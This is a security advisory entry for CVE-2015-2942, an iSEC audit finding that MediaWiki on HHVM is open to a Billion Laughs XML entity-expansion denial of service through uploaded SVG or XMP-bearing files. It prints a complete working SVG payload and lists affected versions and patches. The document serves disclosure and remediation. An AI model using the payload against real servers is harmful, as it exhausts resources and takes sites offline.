iSec found that a standard Billion Laughs attack works with SVG's and PDF's with XMP metadata. They tested this on mediawiki vagrant, so it's not clear if production is vulnerable or not.
FINDING ID: iSEC-WMF1214-13
DESCRIPTION: When uploading an SVG file, or any file which includes XMP metadata, it is possible to
include XML Doctype Declarations which trigger a Billion Laughs attack against the XML parser when
the uploaded file is processed. This attack uses a series of expanding XML entities which, when fully
expanded, result in approximately 3GB of data to be processed. This causes the XML parser to consume
all available resources on the system, leaving the webserver unresponsive. An example of a file which
exploits this vulnerability is below:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <!DOCTYPE svg [ <!ENTITY lol "lol"> <!ELEMENT lolz (#PCDATA)> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"> <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]> <svg> <lolz>&lol9;</lolz> </svg>
Patches:
,- 1.24: ,
- 1.23: , (only needed for hhvm, but keep consistent with master for LTS)
- 1.19:
Affected Versions: MediaWiki on HHVM
Type: DoS
CVE: CVE-2015-2942